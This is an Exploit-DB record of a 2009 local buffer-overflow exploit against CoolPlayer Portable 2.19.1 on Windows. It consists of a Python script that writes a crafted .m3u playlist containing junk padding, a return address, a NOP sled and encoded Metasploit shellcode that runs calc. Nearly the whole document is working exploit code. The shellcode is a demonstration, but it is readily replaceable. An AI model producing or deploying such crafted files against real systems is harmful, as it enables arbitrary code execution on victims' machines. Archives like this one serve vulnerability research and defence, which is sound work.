CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)

EDB-ID:

8520

Author:

His0k4

Type:

local

Platform:

Windows

Published:

2009-04-22

#!/usr/bin/python
#[*] Usage   : coolplayer.py
#[*] Bug     : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on :    Xp sp2 (fr)
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com

#[*] Note: I didn't know why the stack's exploit won't work for me but i founded that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\xe4\x94\xba\x83\xeb\xfc\xe2\xf4\x85\x0c\xd0\xba\x79\xe4\x1f\xff"
"\x45\x6f\xe8\xbf\x01\xe5\x7b\x31\x36\xfc\x1f\xe5\x59\xe5\x7f\xf3"
"\xf2\xd0\x1f\xbb\x97\xd5\x54\x23\xd5\x60\x54\xce\x7e\x25\x5e\xb7"
"\x78\x26\x7f\x4e\x42\xb0\xb0\xbe\x0c\x01\x1f\xe5\x5d\xe5\x7f\xdc"
"\xf2\xe8\xdf\x31\x26\xf8\x95\x51\xf2\xf8\x1f\xbb\x92\x6d\xc8\x9e"
"\x7d\x27\xa5\x7a\x1d\x6f\xd4\x8a\xfc\x24\xec\xb6\xf2\xa4\x98\x31"
"\x09\xf8\x39\x31\x11\xec\x7f\xb3\xf2\x64\x24\xba\x79\xe4\x1f\xd2"
"\x45\xbb\xa5\x4c\x19\xb2\x1d\x42\xfa\x24\xef\xea\x11\x14\x1e\xbe"
"\x26\x8c\x0c\x44\xf3\xea\xc3\x45\x9e\x87\xf5\xd6\x1a\xe4\x94\xba")

exploit = "\x41"*220 + "\x5D\x38\x82\x7C" + "\x90"*122 + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!\n"
except:
    print "Error"

# milw0rm.com [2009-04-22]